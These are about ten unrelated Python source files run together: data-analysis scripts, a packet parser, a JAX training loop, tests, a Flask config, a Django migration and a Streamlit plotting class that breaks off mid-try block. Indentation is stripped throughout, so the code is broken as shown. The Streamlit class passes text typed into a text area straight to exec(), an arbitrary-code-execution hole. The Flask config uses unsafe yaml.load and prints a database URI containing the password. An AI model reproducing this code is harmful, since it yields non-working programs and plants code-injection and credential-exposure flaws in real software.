#!/usr/bin/env python3
# 1st-party
import collections
import csv
import json
import logging
import os
import sys
# 2nd-party
import package_cache
import translation_cache
# Data source 3: a map from each project to the date (not time) when it
# last added, updated, or removed a package.
PACKAGE_LAST_MODIFIED_FILENAME = '/var/experiments-output/package_cache.json'
# The time since the hypothetical compromise began (i.e. since the download log
# began).
SINCE_TIMESTAMP = 1395360000
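# For reference, a minimal sketch of the package_cache helper this script
# relies on (an assumption inferred from its use below, where the returned
# timestamp is asserted to be strictly before the cutoff):
#
#   def get_last_timestamp_before_compromise(timestamps, cutoff):
#       """Return the latest timestamp strictly before cutoff, else None."""
#       earlier = [t for t in timestamps if t < cutoff]
#       return max(earlier) if earlier else None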
# This script traverses the given download log (in the sorted.simple.log
# format) and counts every package request that occurred.
def sort_packages_by_popularity(filename):
packages = collections.Counter()
# Zero counters for all projects estimated to exist before compromise.
with open(PACKAGE_LAST_MODIFIED_FILENAME, 'rt') as fp:
packages_list = json.load(fp)
for package in packages_list:
# Get timestamps of when the project added/updated/removed a package.
timestamps = packages_list[package]
timestamp = \
package_cache.get_last_timestamp_before_compromise(timestamps,
SINCE_TIMESTAMP)
# This project was updated sometime before compromise.
# That means this project can be included in the set of projects that
# existed before compromise, giving us a better estimate of the true
# number of projects that existed just before compromise.
if timestamp:
assert timestamp < SINCE_TIMESTAMP
packages[package] = 0
logging.info('# of projects estimated to exist before compromise: {:,}'\
.format(len(packages)))
# Now count the popularity of packages that were actually downloaded.
# NOTE: This is extremely biased towards the compromise period, but we have
# no better data. Must note in paper.
with open(filename, 'rt') as simple_log:
requests = csv.reader(simple_log)
for timestamp, anonymized_ip, request, user_agent in requests:
package_name = translation_cache.infer_package_name(request)
assert package_name
assert len(package_name) > 0, request
packages[package_name] += 1
    # Report totals, then write packages ordered by descending popularity.
logging.info('total # projects seen to exist after compromise: {:,}'\
.format(len(packages)))
with open('/var/experiments-output/packages_by_popularity.txt', 'wt') as \
ordered_packages_file:
for package, count in packages.most_common():
assert len(package) > 0
ordered_packages_file.write("{},{}\n".format(package, count))
if __name__ == '__main__':
# rw for owner and group but not others
os.umask(0o07)
assert len(sys.argv) == 2
log_filename = sys.argv[1]
sort_packages_by_popularity(log_filename)
|
"""Project: Eskapade - A Python-based package for data analysis.
Module: root_analysis.decorators.roofit
Created: 2017/04/24
Description:
Decorators for PyROOT RooFit objects
Authors:
KPMG Advanced Analytics & Big Data team, Amstelveen, The Netherlands
Redistribution and use in source and binary forms, with or without
modification, are permitted according to the terms listed in the file
LICENSE.
"""
import ROOT
def coll_iter(coll):
"""Iterate over items in RooAbsCollection."""
it = coll.fwdIterator()
obj = it.next()
while obj:
yield obj
obj = it.next()
def ws_contains(ws, key):
    """Check if RooWorkspace contains an object."""
    if isinstance(key, str):
        return bool(ws.obj(key))
    try:
        obj = ws.obj(key.GetName())
        return obj == key
    except Exception:
        return False
def ws_put(ws, *args):
"""Put object in RooWorkspace."""
ws_import = getattr(ROOT.RooWorkspace, 'import')
if len(args) == 1 and any(isinstance(args[0], c) for c in (ROOT.RooAbsArg, ROOT.RooArgSet, ROOT.RooAbsData)):
args += (ROOT.RooCmdArg(),)
return ws_import(ws, *args)
def data_set_iter(self):
"""Iterate over events in RooDataSet."""
for it in range(self.numEntries()):
yield self.get(it)
def ws_setitem(ws, key, value):
"""Put object in RooWorkspace dict-style."""
if not isinstance(value, ROOT.TObject):
raise AssertionError('Cannot import object with type "{}" into workspace.'.format(type(value)))
getattr(ws, 'import')(value, key)
# set decorators
ROOT.RooAbsReal.__float__ = lambda self: self.getVal()
ROOT.RooAbsCollection.__iter__ = coll_iter
ROOT.RooAbsCollection.__getitem__ = lambda c, i: c.find(i)
ROOT.RooAbsCollection.__contains__ = lambda c, i: True if c.find(i) else False
ROOT.RooArgSet.__getitem__ = ROOT.RooAbsCollection.__getitem__
ROOT.RooArgList.__getitem__ = lambda l, i: l.at(i) if isinstance(i, int) else ROOT.RooAbsCollection.__getitem__(l, i)
ROOT.RooWorkspace.__contains__ = ws_contains
ROOT.RooWorkspace.__getitem__ = lambda ws, k: ws.obj(k)
ROOT.RooWorkspace.__setitem__ = ws_setitem
ROOT.RooWorkspace.put = ws_put
ROOT.RooDataSet.__iter__ = data_set_iter
# flag functions that create objects that should be deleted
for func in [ROOT.RooAbsPdf.generate, ROOT.RooAbsPdf.fitTo, ROOT.RooAbsData.reduce]:
func._creates = True
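# Example usage (a sketch, assuming a working ROOT/RooFit installation):
#
#   ws = ROOT.RooWorkspace('ws')
#   x = ROOT.RooRealVar('x', 'x', 0.0, 1.0)
#   ws.put(x)                 # ws_put supplies the default RooCmdArg
#   assert 'x' in ws          # ws_contains
#   print(float(ws['x']))     # __getitem__ plus RooAbsReal.__float__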
|
"""PacketMeta, Use DPKT to pull out packet information and convert those
attributes to a dictionary based output."""
import datetime
import dpkt
# Local imports
from chains.links import link
from chains.utils import file_utils, data_utils
class PacketMeta(link.Link):
"""PacketMeta, Use DPKT to pull out packet information and convert those
attributes to a dictionary based output."""
def __init__(self):
"""Initialize PacketMeta Class"""
# Call super class init
super(PacketMeta, self).__init__()
# Set my output
self.output_stream = self.packet_meta_data()
def packet_meta_data(self):
"""Pull out the metadata about each packet from the input_stream
Args:
None
Returns:
generator (dictionary): a generator that contains packet meta data in the form of a dictionary"""
# For each packet in the pcap process the contents
for item in self.input_stream:
# Output object
output = {}
# Grab the fields I need
timestamp = item['timestamp']
buf = item['raw_buf']
# Print out the timestamp in UTC
output['timestamp'] = datetime.datetime.utcfromtimestamp(timestamp)
# Unpack the Ethernet frame (mac src/dst, ethertype)
eth = dpkt.ethernet.Ethernet(buf)
output['eth'] = {'src': eth.src, 'dst': eth.dst, 'type':eth.type, 'len': len(eth)}
# Grab packet data
packet = eth.data
# Packet Type ('EtherType') (IP, ARP, PPPoE, IP6... see http://en.wikipedia.org/wiki/EtherType)
if hasattr(packet, 'data'):
output['packet'] = {'type': packet.__class__.__name__, 'data': packet.data}
else:
output['packet'] = {'type': None, 'data': None}
            # Is this an IP packet?
if output['packet']['type'] == 'IP':
# Pull out fragment information (flags and offset all packed into off field, so use bitmasks)
df = bool(packet.off & dpkt.ip.IP_DF)
mf = bool(packet.off & dpkt.ip.IP_MF)
offset = packet.off & dpkt.ip.IP_OFFMASK
# Pulling out src, dst, length, fragment info, TTL, checksum and Protocol
output['packet'].update({'src':packet.src, 'dst':packet.dst, 'p': packet.p, 'len':packet.len, 'ttl':packet.ttl,
'df':df, 'mf': mf, 'offset': offset, 'checksum': packet.sum})
# Is this an IPv6 packet?
elif output['packet']['type'] == 'IP6':
# Pulling out the IP6 fields
output['packet'].update({'src':packet.src, 'dst':packet.dst, 'p': packet.p, 'len':packet.plen, 'ttl':packet.hlim})
# If the packet isn't IP or IPV6 just pack it as a dictionary
else:
output['packet'].update(data_utils.make_dict(packet))
            # For the transport layer we set the transport to None; hopefully
            # a 'link' further along the chain will manage the transport functionality.
            output['transport'] = None
            # For the application layer we set the application to None; hopefully
            # a 'link' further along the chain will manage the application functionality.
            output['application'] = None
# All done
yield output
def test():
"""Test for PacketMeta class"""
from chains.sources import packet_streamer
import pprint
# Create a PacketStreamer and set its output to PacketMeta input
data_path = file_utils.relative_dir(__file__, '../../data/http.pcap')
streamer = packet_streamer.PacketStreamer(iface_name=data_path, max_packets=50)
meta = PacketMeta()
meta.link(streamer)
for item in meta.output_stream:
pprint.pprint(item)
if __name__ == '__main__':
test()
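# Worked example of the IP fragment bitmasks used in packet_meta_data above
# (the off value is assumed for illustration): for packet.off = 0x2064,
#   df     = bool(0x2064 & dpkt.ip.IP_DF)   -> False (DF is bit 0x4000)
#   mf     = bool(0x2064 & dpkt.ip.IP_MF)   -> True  (MF is bit 0x2000)
#   offset = 0x2064 & dpkt.ip.IP_OFFMASK    -> 0x64  (in 8-byte units)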
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train.
Example command:
python -m aux_tasks.grid.train \
--base_dir=/tmp/pw \
--reverb_address=localhost:1234 \
--config=aux_tasks/grid/config.py:implicit
"""
import functools
import pathlib
import signal
from typing import Callable, NamedTuple, Optional, Sequence
from absl import app
from absl import flags
from absl import logging
import chex
from clu import checkpoint
from clu import metric_writers
from clu import metrics as clu_metrics
from clu import periodic_actions
from flax import struct
import flax.linen as nn
from flax.training.train_state import TrainState
import jax
import jax.numpy as jnp
from ml_collections import config_dict
from ml_collections import config_flags
import optax
import tqdm
from aux_tasks.grid import dataset
from aux_tasks.grid import loss_utils
from aux_tasks.grid import utils
_BASE_DIR = flags.DEFINE_string('base_dir', None, 'Base directory')
_CONFIG = config_flags.DEFINE_config_file('config', lock_config=True)
@struct.dataclass
class TrainMetrics(clu_metrics.Collection):
loss: clu_metrics.Average.from_output('loss')
rank: clu_metrics.Average.from_output('rank')
# @struct.dataclass
# class EvalMetrics(clu_metrics.Collection):
# grassman_distance: clu_metrics.LastValue.from_output('grassman_distance')
# dot_product: clu_metrics.LastValue.from_output('dot_product')
# top_singular_value: clu_metrics.LastValue.from_output('top_singular_value')
@struct.dataclass
class EvalMetrics(clu_metrics.Collection):
eval_loss: clu_metrics.Average.from_output('loss')
class SpectralDense(nn.Module):
"""Spectral Dense."""
features: int
kernel_init: Callable[[chex.PRNGKey, tuple[int, Ellipsis], jnp.dtype], chex.Array]
@nn.compact
def __call__(self, inputs):
kernel = self.param('kernel', self.kernel_init,
(inputs.shape[-1], self.features))
# TODO(jfarebro): use power iteration
_, s, _ = jnp.linalg.svd(kernel, full_matrices=False)
kernel /= s[0]
return jnp.einsum('...x,xf->...f', inputs, kernel)
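# A possible power-iteration replacement for the full SVD above (a sketch,
# not this repo's implementation; `num_iters` is an assumed knob):
#
#   def _top_singular_value(kernel, key, num_iters=10):
#       v = jax.random.normal(key, (kernel.shape[-1],))
#       for _ in range(num_iters):
#           u = kernel @ v
#           u = u / jnp.linalg.norm(u)
#           v = kernel.T @ u
#           v = v / jnp.linalg.norm(v)
#       return jnp.linalg.norm(kernel @ v)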
class MLPEncoder(nn.Module):
"""MLP Encoder."""
num_layers: int
num_units: int
embedding_dim: int
@nn.compact
def __call__(self, inputs):
kernel_init = nn.initializers.xavier_uniform()
x = inputs
for _ in range(self.num_layers - 1):
x = nn.Dense(self.num_units, kernel_init=kernel_init)(x)
x = nn.PReLU()(x)
x = nn.Dense(self.embedding_dim, kernel_init=kernel_init)(x)
x = nn.PReLU()(x)
return x
class ModuleOutputs(NamedTuple):
phi: chex.Array
predictions: Optional[chex.Array]
class ImplicitModule(nn.Module):
encoder: nn.Module
@nn.compact
def __call__(self, inputs):
return ModuleOutputs(self.encoder(inputs), None)
class ExplicitModule(nn.Module):
"""Explicit Module."""
encoder: nn.Module
num_tasks: int
@nn.compact
def __call__(self, inputs):
kernel_init = nn.initializers.xavier_uniform()
phi = self.encoder(inputs)
x = nn.Dense(self.num_tasks, kernel_init=kernel_init)(phi)
return ModuleOutputs(phi, x)
class LinearModule(nn.Module):
"""Linear Module."""
num_tasks: int
@nn.compact
def __call__(self, phi):
kernel_init = nn.initializers.xavier_uniform()
x = nn.Dense(self.num_tasks, kernel_init=kernel_init)(phi)
return x
@functools.partial(
    jax.jit, donate_argnums=(0, 1), static_argnames=('stop_grad', 'rcond'))
def train_step_naive(state,
metrics,
inputs,
targets,
*,
stop_grad = True,
rcond = 1e-5):
"""Train naive CG."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
phis = outputs.phi
# ws = jax.scipy.sparse.linalg.cg(
# phis.T @ phis, phis.T @ targets, tol=1e-12)[0]
ws, _, _, _ = jnp.linalg.lstsq(phis, targets, rcond=rcond)
if stop_grad:
ws = jax.lax.stop_gradient(ws)
task_outputs = phis @ ws
loss = jnp.mean(optax.l2_loss(task_outputs, targets))
rank = jnp.linalg.matrix_rank(phis.T @ phis)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
@functools.partial(
jax.jit, static_argnames=('batch_sizes', 'alpha'), donate_argnums=(0, 1))
def train_step_implicit(state, metrics,
inputs, targets, *,
batch_sizes,
alpha):
"""Train step implicit."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
phis = outputs.phi
rank = jnp.linalg.matrix_rank(phis.T @ phis)
# Split out phis for implicit least squares grad computation
phis = loss_utils.split_in_chunks(phis, [
batch_sizes.main,
batch_sizes.weight,
batch_sizes.weight,
batch_sizes.cov,
batch_sizes.cov,
]) # pyformat: disable
# Split out psis for implicit least squares grad computation
psis = loss_utils.split_in_chunks(targets, [
batch_sizes.main,
batch_sizes.weight,
batch_sizes.weight
]) # pyformat: disable
loss = loss_utils.implicit_least_squares(*phis, *psis, alpha=alpha)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
@functools.partial(
    jax.jit, static_argnames=('alpha',), donate_argnums=(0, 1))
def train_step_naive_implicit(state, metrics,
inputs, targets, *,
alpha):
"""Train naive implicit."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
phis = outputs.phi
# Split out phis for implicit least squares grad computation
loss = loss_utils.naive_implicit_least_squares(phis, targets, alpha=alpha)
rank = jnp.linalg.matrix_rank(phis.T @ phis)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
@functools.partial(jax.jit, donate_argnums=(0, 1))
def train_step_explicit(state,
metrics,
inputs,
targets):
"""Train naive implicit."""
def loss_fn(params):
outputs = state.apply_fn(params, inputs)
predictions = outputs.predictions
phis = outputs.phi
    # Mean squared error between the explicit head's predictions and targets.
loss = jnp.mean(optax.l2_loss(predictions, targets))
rank = jnp.linalg.matrix_rank(phis.T @ phis)
metrics_update = metrics.single_from_model_output(loss=loss, rank=rank)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(state.params)
state = state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return state, metrics
# @functools.partial(jax.jit, static_argnames=('config'))
# def evaluate_mdp(state: TrainState, aux_task_matrix: chex.Array,
# config: config_dict.ConfigDict) -> clu_metrics.Collection:
# """Evaluate."""
# u = loss_utils.top_d_singular_vectors(aux_task_matrix, config.embedding_dim)
# num_states = u.shape[0]
# states = jax.nn.one_hot(jnp.arange(num_states), num_states)
# phis = state.apply_fn(state.params, states)
# top_singular_value = jnp.linalg.norm(phis.T @ phis, ord=2)
# grassman_distance = loss_utils.grassman_distance(phis, u)
# if phis.shape[-1] == 1:
# dot_product = phis.T @ u / (jnp.linalg.norm(phis) * jnp.linalg.norm(u))
# dot_product = dot_product.flatten()
# else:
# dot_product = None
# return EvalMetrics.single_from_model_output(
# grassman_distance=grassman_distance,
# dot_product=dot_product,
# top_singular_value=top_singular_value)
def create_default_writer():
  return metric_writers.create_default_writer()
@functools.partial(jax.jit, donate_argnums=(1, 2))
def evaluate_step(
train_state,
eval_state,
metrics,
inputs,
targets):
"""Eval train step."""
outputs = train_state.apply_fn(train_state.params, inputs)
phis = outputs.phi
def loss_fn(params):
predictions = jax.vmap(eval_state.apply_fn, in_axes=(None, 0))(params, phis)
loss = jnp.mean(optax.l2_loss(predictions, targets))
metrics_update = EvalMetrics.single_from_model_output(loss=loss)
return loss, metrics_update
grad_fn = jax.grad(loss_fn, argnums=0, has_aux=True)
grads, metrics_update = grad_fn(eval_state.params)
eval_state = eval_state.apply_gradients(grads=grads)
metrics = metrics.merge(metrics_update)
return eval_state, metrics
def evaluate(base_dir, config, *,
train_state):
"""Eval function."""
chkpt_manager = checkpoint.Checkpoint(str(base_dir / 'eval'))
writer = create_default_writer()
key = jax.random.PRNGKey(config.eval.seed)
model_init_key, ds_key = jax.random.split(key)
linear_module = LinearModule(config.eval.num_tasks)
params = linear_module.init(model_init_key,
jnp.zeros((config.encoder.embedding_dim,)))
lr = optax.cosine_decay_schedule(config.eval.learning_rate,
config.num_eval_steps)
optim = optax.adam(lr)
ds = dataset.get_dataset(config, ds_key, num_tasks=config.eval.num_tasks)
ds_iter = iter(ds)
state = TrainState.create(
apply_fn=linear_module.apply, params=params, tx=optim)
state = chkpt_manager.restore_or_initialize(state)
report_progress = periodic_actions.ReportProgress(
num_train_steps=config.num_eval_steps, writer=writer)
hooks = [
report_progress,
periodic_actions.Profile(num_profile_steps=5, logdir=str(base_dir))
]
def handle_preemption(signal_number, _):
logging.info('Received signal %d, saving checkpoint.', signal_number)
with report_progress.timed('checkpointing'):
chkpt_manager.save(state)
logging.info('Finished saving checkpoint.')
signal.signal(signal.SIGTERM, handle_preemption)
metrics = EvalMetrics.empty()
with metric_writers.ensure_flushes(writer):
for step in tqdm.tqdm(range(state.step, config.num_eval_steps)):
with jax.profiler.StepTraceAnnotation('eval', step_num=step):
states, targets = next(ds_iter)
state, metrics = evaluate_step(
train_state, state, metrics, states, targets)
if step % config.log_metrics_every == 0:
writer.write_scalars(step, metrics.compute())
metrics = EvalMetrics.empty()
for hook in hooks:
hook(step)
# Finally, evaluate on the true(ish) test aux task matrix.
states, targets = dataset.EvalDataset(config, ds_key).get_batch()
@jax.jit
def loss_fn():
outputs = train_state.apply_fn(train_state.params, states)
phis = outputs.phi
predictions = jax.vmap(
state.apply_fn, in_axes=(None, 0))(state.params, phis)
return jnp.mean(optax.l2_loss(predictions, targets))
test_loss = loss_fn()
writer.write_scalars(config.num_eval_steps + 1, {'test_loss': test_loss})
def train(base_dir, config):
"""Train function."""
print(config)
chkpt_manager = checkpoint.Checkpoint(str(base_dir / 'train'))
writer = create_default_writer()
# Initialize dataset
key = jax.random.PRNGKey(config.seed)
key, subkey = jax.random.split(key)
ds = dataset.get_dataset(config, subkey, num_tasks=config.num_tasks)
ds_iter = iter(ds)
key, subkey = jax.random.split(key)
encoder = MLPEncoder(**config.encoder)
train_config = config.train.to_dict()
train_method = train_config.pop('method')
module_config = train_config.pop('module')
module_class = module_config.pop('name')
module = globals().get(module_class)(encoder, **module_config)
train_step = globals().get(f'train_step_{train_method}')
train_step = functools.partial(train_step, **train_config)
params = module.init(subkey, next(ds_iter)[0])
lr = optax.cosine_decay_schedule(config.learning_rate, config.num_train_steps)
optim = optax.chain(optax.adam(lr),
# optax.adaptive_grad_clip(0.15)
)
state = TrainState.create(apply_fn=module.apply, params=params, tx=optim)
state = chkpt_manager.restore_or_initialize(state)
# Hooks
report_progress = periodic_actions.ReportProgress(
num_train_steps=config.num_train_steps, writer=writer)
hooks = [
report_progress,
periodic_actions.Profile(num_profile_steps=5, logdir=str(base_dir))
]
def handle_preemption(signal_number, _):
logging.info('Received signal %d, saving checkpoint.', signal_number)
with report_progress.timed('checkpointing'):
chkpt_manager.save(state)
logging.info('Finished saving checkpoint.')
signal.signal(signal.SIGTERM, handle_preemption)
metrics = TrainMetrics.empty()
with metric_writers.ensure_flushes(writer):
for step in tqdm.tqdm(range(state.step, config.num_train_steps)):
with jax.profiler.StepTraceAnnotation('train', step_num=step):
states, targets = next(ds_iter)
state, metrics = train_step(state, metrics, states, targets)
logging.log_first_n(logging.INFO, 'Finished training step %d', 5, step)
if step % config.log_metrics_every == 0:
writer.write_scalars(step, metrics.compute())
metrics = TrainMetrics.empty()
# if step % config.log_eval_metrics_every == 0 and isinstance(
# ds, dataset.MDPDataset):
# eval_metrics = evaluate_mdp(state, ds.aux_task_matrix, config)
# writer.write_scalars(step, eval_metrics.compute())
for hook in hooks:
hook(step)
chkpt_manager.save(state)
return state
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
base_dir = pathlib.Path(_BASE_DIR.value)
config = _CONFIG.value
train_state = train(base_dir, config)
evaluate(base_dir, config, train_state=train_state)
if __name__ == '__main__':
app.run(main)
|
"""
Oscillators
"""
import numpy as np
from blipwave import RATE
def vco(waveform, frequencies, rate=48000):
"""
    Simulates a voltage-controlled oscillator.
    Args:
        waveform: shape of the oscillation, any periodic function
        frequencies: a numpy array of instantaneous frequencies (in Hz) at each sample
    Returns:
        numpy array of the waveform with varying frequency.
"""
return waveform(2*np.pi * np.cumsum(frequencies/rate))
def lfo(freq, waveform, length, rate=48000):
"""
    Simulates a low-frequency oscillator.
Args:
freq: frequency of the oscillation
waveform: form of the oscillation, a periodic function
length: number of samples to output
Returns:
numpy array of waveform with constant frequency
"""
return waveform(2 * np.pi * np.linspace(0, freq*length/rate, length))
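# Example usage (a sketch; np.sin stands in for any periodic waveform):
#
#   chirp  = vco(np.sin, np.linspace(220.0, 440.0, 48000))  # 1 s rising sweep
#   wobble = lfo(5.0, np.sin, 48000)                        # 5 Hz LFO, 1 s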
|
#
# Copyright (c) 2016-2022 Deephaven Data Labs and Patent Pending
#
import unittest
from deephaven import empty_table
from deephaven.perfmon import process_info_log, process_metrics_log, server_state_log, \
query_operation_performance_log, query_performance_log, update_performance_log, metrics_get_counters, \
metrics_reset_counters
from tests.testbase import BaseTestCase
def create_some_counters():
t = empty_table(10).update(formulas=["X=i"])
t2 = empty_table(10).update(formulas=["X=i"])
return t.join(t2, on=["X"])
class PerfmonTestCase(BaseTestCase):
def test_metrics_get_counters(self):
metrics_reset_counters()
t = create_some_counters()
# counters should accumulate some values after performing some operations
counters_str = metrics_get_counters()
t = create_some_counters()
# counters now should have different values after performing the same operation one more time
counters_str2 = metrics_get_counters()
self.assertNotEqual(counters_str, counters_str2)
# After reset and performing the same operation again, the counters' values should reset.
# We can't ensure they are exactly the same as before, because the engine state may be
# captured in some non-exactly-zero-counters due to other pre-existing table updates.
metrics_reset_counters()
t = create_some_counters()
counters_str3 = metrics_get_counters()
self.assertNotEqual(counters_str2, counters_str3)
def test_process_logs(self):
log_table = process_info_log()
self.assertTrue(log_table.to_string())
log_table = server_state_log()
self.assertTrue(log_table.to_string())
log_table = process_metrics_log()
self.assertTrue(log_table.to_string())
def test_query_logs(self):
log_table = query_operation_performance_log()
self.assertTrue(log_table.to_string())
log_table = query_performance_log()
self.assertTrue(log_table.to_string())
log_table = update_performance_log()
self.assertTrue(log_table.to_string())
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
__author__ = 'vincent'
import os
import yaml
import json
from app.utils import toolkit
Cfg = {}
BodySchema = {}
# Get the directory containing this file.
basedir = os.path.abspath(os.path.dirname(__file__))
# Load the request-body validation schema and the base configuration.
with open(basedir + "/body-schema.yaml") as f:
BodySchema = yaml.load(f)
with open(basedir + "/base-config.yaml") as f:
Cfg = yaml.load(f)
SERVICE_CONFIG_PATH = os.environ.get('SERVICE_TEMPLATE_CONFIG_PATH')
with open(SERVICE_CONFIG_PATH) as f:
    _d = yaml.safe_load(f)
if _d:
toolkit.obj_update(_d, Cfg)
class Config:
    # Logger name
    LOGGER_NAME = 'V'
    SECRET_KEY = Cfg.get('webServer', {}).get('secret')
    # Salted-hash string format
    ENCRYPT_STR_FORMAT = Cfg.get('webServer', {}).get('str_format')
    # Secret key for token encryption
    TOKEN_SECRET_KEY = Cfg.get('webServer', {}).get('token_secret')
    # AES key/IV for AK encryption and decryption
    AES_KEY = Cfg.get('AES', {}).get('key')
    AES_IV = Cfg.get('AES', {}).get('iv')
    # Database connection pool size; defaults to the engine's default (usually 5)
    SQLALCHEMY_POOL_SIZE = 5
    # Extra connections allowed once the pool is full; extras are closed and
    # discarded when returned to the pool.
    SQLALCHEMY_MAX_OVERFLOW = 10
    # Commit automatically on request teardown
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    # Disabled to avoid excessive memory overhead; for slow-query profiling,
    # keep SQLALCHEMY_TRACK_MODIFICATIONS=False and set SQLALCHEMY_RECORD_QUERIES=True.
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    # Record slow queries
    SQLALCHEMY_RECORD_QUERIES = True
    # Default number of items displayed per page in pagination
    PER_PAGE = 20
    # Threshold (in seconds) for flagging slow SQL queries
    FLASKY_SLOW_DB_QUERY_TIME = 0.5
    # MySQL connection settings
    SQLALCHEMY_DATABASE_URI = "mysql://{}:{}@{}:{}/{}?charset=utf8".format(
        Cfg['mysql']['user'],
        Cfg['mysql']['password'],
        Cfg['mysql']['host'],
        Cfg['mysql']['port'],
        # Cfg['mysql']['database']
        'ast_test'
    )
    print(SQLALCHEMY_DATABASE_URI)
    # Redis connection settings
    # REDIS_URL = "redis://localhost:6379/3"
    @staticmethod
    def init_app(app):
        pass
class TestConfig:
    # Logger name
    LOGGER_NAME = 'VTest'
    SECRET_KEY = Cfg.get('webServer', {}).get('secret')
    # Salted-hash string format
    ENCRYPT_STR_FORMAT = Cfg.get('webServer', {}).get('str_format')
    # Secret key for token encryption
    TOKEN_SECRET_KEY = Cfg.get('webServer', {}).get('token_secret')
    # AES key/IV for AK encryption and decryption
    AES_KEY = Cfg.get('AES', {}).get('key')
    AES_IV = Cfg.get('AES', {}).get('iv')
    # Database connection pool size; defaults to the engine's default (usually 5)
    # SQLALCHEMY_POOL_SIZE = 5
    # Extra connections allowed once the pool is full; extras are closed and
    # discarded when returned to the pool.
    # SQLALCHEMY_MAX_OVERFLOW = 10
    # Commit automatically on request teardown
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    # For slow-query profiling, keep SQLALCHEMY_TRACK_MODIFICATIONS=False and
    # set SQLALCHEMY_RECORD_QUERIES=True; enabled here for testing.
    SQLALCHEMY_TRACK_MODIFICATIONS = True
    # Record slow queries
    # SQLALCHEMY_RECORD_QUERIES = True
    # Default number of items displayed per page in pagination
    PER_PAGE = 20
    # Threshold (in seconds) for flagging slow SQL queries
    # FLASKY_SLOW_DB_QUERY_TIME = 0.5
    # MySQL connection settings
    SQLALCHEMY_DATABASE_URI = "mysql://{}:{}@{}:{}/{}?charset=utf8".format(
        Cfg['mysql']['user'],
        Cfg['mysql']['password'],
        Cfg['mysql']['host'],
        Cfg['mysql']['port'],
        'ast_test'
    )
    # Use an SQLite database instead
    # SQLALCHEMY_DATABASE_URI = "sqlite:///{}".format( os.path.join(os.path.dirname(basedir), 'data-sqlite.db') )
    print(SQLALCHEMY_DATABASE_URI)
    # Redis connection settings
    # REDIS_URL = "redis://localhost:6379/3"
    @staticmethod
    def init_app(app):
        pass
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-09 08:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('smartshark', '0012_auto_20160608_1459'),
]
operations = [
migrations.AddField(
model_name='project',
name='clone_username',
field=models.CharField(blank=True, max_length=200),
),
]
|
# -*- coding: utf-8 -*-
""" Manage Historical Data """
import yfdao
import sql
def add_symbol(symbol):
info = yfdao.info(symbol.upper())
name = info['longName']
ex = info['fullExchangeName']
region = info['region']
ex_tz = info['exchangeTimezoneShortName']
sql.dao.add_symbol(symbol, name, ex, ex_tz)
def enable_symbol(symbol, en=True):
sql.dao.enable_symbol(symbol.upper(), en)
def load_symbols(syms):
for s in syms:
load_symbol(s.upper())
def load_symbol(sym):
sql.dao.clear_history(sym)
period = "max"
(hist, splits, divs) = yfdao.load(sym)
sql.dao.add_history_bulk( hist )
sql.dao.add_splits( splits )
sql.dao.add_dividends( divs )
def update_symbols():
    pass
def reset_symbol(symbol):
sql.dao.clear_history(symbol.upper())
    sql.dao.enable_symbol(symbol.upper(), False)
def list_symbols(inactive=False):
return sql.dao.list_symbols(inactive)
|
# Built-In Modules
import os, sys
from pathlib import Path as pt
# DATA Analysis
import numpy as np
from scipy.optimize import curve_fit
from uncertainties import ufloat as uf
from uncertainties import unumpy as unp
from plotly.subplots import make_subplots
import plotly.graph_objects as go
try: import streamlit as st
except ImportError:
filename = pt(__file__)
pipFolder = filename.parent.parent / "pipPackages"
if pipFolder.exists():
packageName = "streamlit-0.51.0-py2.py3-none-any.whl"
package = os.path.join(pipFolder, packageName)
import subprocess
subprocess.check_call([sys.executable, '-m', 'pip', 'install', package])
import streamlit as st
from timescan import timescanplot
from FELion_constants import colors
from io import StringIO
import contextlib
@contextlib.contextmanager
def stdoutIO(stdout=None):
old = sys.stdout
if stdout is None:
stdout = StringIO()
sys.stdout = stdout
yield stdout
sys.stdout = old
class depletionplot:
def __init__(self, location):
location = st.text_input("Current Location", location)
self.location = pt(location)
self.initialise()
self.fig = make_subplots(rows=1, cols=2)
try:
self.get_timescan_data()
Koff, N = self.resOff_fit()
Na0, Nn0, Kon = self.resOn_fit(Koff, N)
self.make_slider(Koff, Kon, N, Na0, Nn0)
Koff = self.koff_slider
Kon = self.kon_slider
N = self.n_slider
Na0 = self.na_slider
Nn0 = self.nn_slider
self.runFit(Koff, Kon, N, Na0, Nn0)
layout = go.Layout(
xaxis={"title":self.xaxis_title},
yaxis={"title":"Counts"},
xaxis2={"title":self.xaxis_title},
yaxis2={"title":"Relative depletion of active isomer"}
)
self.fig.update_layout(layout)
st.plotly_chart(self.fig, height=700)
pycode = st.text_area("pyCode")
with stdoutIO() as result:
exec(pycode)
st.write(result.getvalue())
except Exception as error:
